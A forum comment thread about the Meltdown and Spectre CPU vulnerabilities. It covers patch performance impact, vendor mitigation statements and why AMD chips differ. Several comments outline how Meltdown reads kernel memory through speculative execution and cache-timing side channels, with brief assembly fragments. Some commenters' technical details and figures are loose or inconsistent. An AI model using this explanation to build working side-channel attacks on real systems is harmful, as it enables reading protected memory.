Back then I already wondered how many valid use cases there are for these kind of instructions, apart from synthetic benchmarks. And even if you can use it to make an algorithm faster, how many times is it used incorrectly because someone just thought it would be better without benchmarking properly, (or because they mess up some compiler).
So my (naive) thought back then was "why not just noop all those cache related instructions in the CPU itself?" Then during 2017 I saw a talk about using these very same instructions for creating a side channel between two VMs in Amazon's cloud, and now this here. I am aware you could still make sure the data is not cached by just thrashing the cache (which would make this attack much slower than it already is) but really, what have these flush and prefetch instructions ever done for us?
Flushing the cache is important when the data must be in the main memory, for instance when an I/O device does DMA to it and is not coherent with the caches. As for prefetch instructions, they are hard to use correctly, but in some cases can make an algorithm much faster.
I'd recommend it (any moderately recent version) for simply learning as well.
Learning the internals of everything between memory and functional CPU subunits is fun (and useful).
And the ideas don't change that quickly (e.g. the TLB and ROBs that were attacked here have been around for decades in similar form). There's only so many clever things you can do when a one bit buffer is expensive.
I imagine there might be some stuff in research papers, but that seems like an even worse learning experience.
For example: https://www.google.com/search?q=branch+prediction+scoreboard...
All in all I think the only legit use may be in benchmarks.
Most drivers I've seen just use the kernel's DMA API (dma_alloc_coherent), which is guaranteed to provide a buffer that doesn't require any explicit cache management. If the architecture is coherent, then it leaves caching turned on for those pages. If it's non-coherent, then it turns it off.
In certain specific conditions, they can be used to increase performance, but these days this is increasingly rare because the hardware cache management is surprisingly intelligent.
This. The talks about 30% (or even 300%!) impact based on a graph without any details or methodology, often itself based on a microbenchmark or a tweet that got viral is really not helping.
I especially liked the AWS forum post being breathlessly circulated which is from someone claiming that their business critical workload no longer fits on a single m1.medium (1 vCPU, <4GB RAM), joined by someone else who was actually swapping and hitting the OOM killer.
There is a real impact but this is going to be the lazy IT worker's new plausible excuse of the day for months…
It matters not what the workload was running on before or accusations of laziness, the key takeaway from that post was that there was an impact on performance caused by the Meltdown/Spectre mitigations.
The fact another commenter barged into the thread with an unrelated issue simply shows that AWS forum operates within the Law of Forums (which states all threads are to be cross pollinated with unrelated issues from at least one other user).
EDIT: I should say that if this fellow is the only affected user from all the computer users of the world, then the mitigations applied can be called successful. That seems unlikely :-)
In this case, the thread made it clear that the real problem was that they didn't have a good deployment story — notice how the original poster was mentioning needing to move everything to an m3.medium manually? I would be quite surprised if they haven't had other problems in the past (e.g. what happens when a system update kicks off if that server is already running at 90+% utilization? or when they get more users and/or the existing users start doing slightly more) but hadn't wanted to deal with the hassle of migrating.
Sometimes this, sometimes that, it depends really.
> The talks about 30% (or even 300%!) impact based on a graph without any details or methodology, often itself based on a microbenchmark or a tweet that got viral is really not helping.
Of course it's helping, everyone learned about CPU architecture, speculative execution, caches, and started trading AMD and INTC all of the sudden.
But to be serious, doesn't "details and methodology" apply to any benchmarks we see on Twitter. Or do people automatically start buying more servers when they read that tweet. Anyone here did that?
The point of that number is warn people to go and measure their own workload. Google measure and yay! not much of an impact. It's great news. Someone who does telephony and maybe is sending lots of tiny little UDP packets back and forth might be impacted. Should they start crying and running around, no. They should measure because it might affect them.
If the usage is split 50/50 kernel/userspace. And the userspace changes slow the app down 10%. Then the user space changes slowed the userspace code down 20%. Likewise if the kernel changes slow the app down 10%, they slowed the kernel code down by 20%.
So the total impact of the changes is 20% in your example.
The high performance of the physical CPU was achieved through means that compromise security. The top of the speed range was bullshit, basically. Now that the top is being lopped off, you experience the true speed of that CPU while operating in a secure manner.
So the proper execution is slower than the secure execution, right? Ergo, it is 'slower'.
Can you share more?
[ADDED: It's back. Was pulled back to make some changes.]
> Measureable: 8-12% - Highly cached random memory, with buffered I/O, OLTP database workloads, and benchmarks with high kernel-to-user space transitions are impacted between 8-12%. Examples include Oracle OLTP (tpm), MariaBD (sysbench), Postgres(pgbench), netperf (< 256 byte), fio (random IO to NvME).
> Modest: 3-7% - Database analytics, Decision Support System (DSS), and Java VMs are impacted less than the “Measureable” category. These applications may have significant sequential disk or network traffic, but kernel/device drivers are able to aggregate requests to moderate level of kernel-to-user transitions. Examples include SPECjbb2005 w/ucode and SQLserver, and MongoDB.
It talks about a significant slowdown, 8%-19% for OLTP Workloads (tpc), sysbench, pgbench, netperf (< 256 byte), and fio (random I/O to NvME). 3%-7% for Database analytics, Decision Support System (DSS), and Java VMs
As mentioned in the article, there are 3 different (identified) vulns, each with its own set of patches, and sometimes multiples different ways to patch. Each of those patch will have its own impact, and work is currently in progress to find new ways to patch that will have a lower impact on performance.
Also, this means we will need to be used to patch, as new vulns of this category will definitely be found, and new changes to kernels/cpu/compilers will be designed and will need to be applied.
> Intel has developed and is rapidly issuing updates for all types of Intel-based computer systems — including personal computers and servers — that render those systems immune from both exploits (referred to as “Spectre” and “Meltdown”)
That states that Meltdown is specifically addressed and mitigated. However, this post by Google does not indicate that "Variant 3", or "Meltdown", can be addressed by a microcode update:
> Mitigating this attack variant requires patching the operating system. For Linux, the patchset that mitigates Variant 3 is called Kernel Page Table Isolation (KPTI). Other operating systems/providers should implement similar mitigations.
The option of applying a microcode update is explicitly called out for their mitigation of "Variant 2":
> Mitigating this attack variant requires either installing and enabling a CPU microcode update from the CPU vendor (e.g., Intel's IBRS microcode), ...
Am I misreading one of these statements?
Does it mean Google applied point-and-shoot type of fixes in several areas, e.g. OS kernel and hypervisor?
Or. The speculative execution did not provide meaningful performance benefits in the first place? At least for Google workloads?
If so - why all this extra complexity?
> You can learn more about mitigations that have been applied to Google’s infrastructure, products, and services here.
Confirms the `chrome://flags/#enable-site-per-process` flag is useful here & sure enough, the 2018-01-05 SPL was waiting for me on my Pixel when I looked.
Furthermore the paper mentions it is unable to reproduce it on AMD and ARM, but has some suggestions of things to try to make the exploit work. Other sources , including AMD itself, claims not to be vulnerable to meltdown, does anyone know the technical reasons as to why, and what is different compared to Intel cpus ?
Normally, that code will just error out right away.
But if you add a new branch before the code (such that the branch is taken to avoid the code, but the CPU predicts the branch to NOT be taken), the CPU will speculatively execute the above code just past your branch. The speculative execution doesn't check for memory violations (because that takes time).
Normally, that's cool: if the new branch IS taken, there is no harm because the the result of the (bad) kernel access will be thrown away. If the new branch IS NOT taken, the CPU notices the bad access and complains.
But if you are extra devious, you can ensure that page X is NOT cached when running this code. After, you check if page X suddenly got cached. That tells you the value of the high-bit of your kernel memory. Keep scanning all the bits and you can read out all of kernel memory.
In short, the speculatively executed branch retrieves a value from a kernel page (that the code shouldn't have access to) - Intel CPUs allow this, but AMD CPUs do not. It then &s the value with 0x01, and then uses the result to calculate and access an address in a page that it DOES have access to.
This results in that address being stored in the TLB (i.e. a cache that stores mapping from virtual to physical memory).
The result of the computation is then discarded, but the address that it calculated is still in TLB. Since there are two possible addresses that could have been cached based on the value of the data in the kernel page, all the code has to do is time the access to each address, and it can discern the value of the bit in the kernel page based on the relative timings.
Do we know this for sure ? I see now that the meltdown paper has a suggestion in chapter 7.1 that the CPU should perform the permission check on the page table before data is fetched to the cache,
But dismisses that suggestion on the grounds it will haves very high performance impact.
Are you saying AMD does the check first anyway, and either takes the performance hit or has found a way to not take a performance hit ?
"AMD processors are not subject to the types of attacks that the kernel page table isolation feature protects against. The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault."
Let's say you want to know if your boss is away on vacation next week so you call their admin and say "you need to double-check my contact info if the boss is going to be out next week". They load up the boss' calendar to check and based on his presence next week then load up your info. Only once done, do they take the time to remember the boss didn't want you to know wether they are in or out. So you hear back, "sorry, can't tell you that, but you follow up with "OK, well can you still double check that my phone number is..."
If they respond quickly with a yes, then your file is still on their screen and the boss is in fact out next week. If there is a short pause while they look it up, then the opposite.
How is that possible? I can understand an attacker reading its own memory, but foreign one via a common mapped gadged section... that is just incredible!
I don't know if Minix or Hurd maps all of ram into the kernel address space though (or if they add the kernel address space to each user space processes , as the exploit also requires)
I've been reading up a bit on these attacks and I was wondering if there are any particular requirements to implement them in an arbitrary language?
For example, can you implement the attack with Java but without JNI? i.e. are syscalls required to be able to leverage the exploit?
I have absolutely no idea if using the JVM would for example, mess with the required precision since I'm guessing one would need to use JNI/JNA to get the timing and that could maybe not be suitable?
Massive performance hit but only on misbehaved software. Well behaved software will not have the performance hit of KPTI.
Kernel could even switch dynamically to KPTI if too many read/write attempts from user space.
mov rax, [Somekerneladdress]
would trigger an interrupt even on speculative execution as described on https://cyber.wtf/2017/07/28/negative-result-reading-kernel-...
ADDED: So in the interrupt handler the kernel could evict all user space pages from cache before returning control to user space so it could not use the timing attack on the cache of the speculative execution of Mov rbx,[rax+Someusermodeaddress] on the address rax+Someusermodeaddress.
cmp $0, [some_readable_but_uncached_addr_containing_zero]
//now the exploit
mov rax, [somekerneladdr]
...the rest of it...
Would it be vulnerable in the same way?
The Mill has portals (possibly) gating everything and making microkernel design easy and fast, so Meltdown would not work. Spectre, not so sure, there are claims the NaR (not a result) option might prevent it.
I bet this will come up in the next talk, looking forward to it.
I'm sure not going to be buying any new CPUs till some new arch's come out which remove this (or make the mitigations performant).
The site breaks if you block their JS.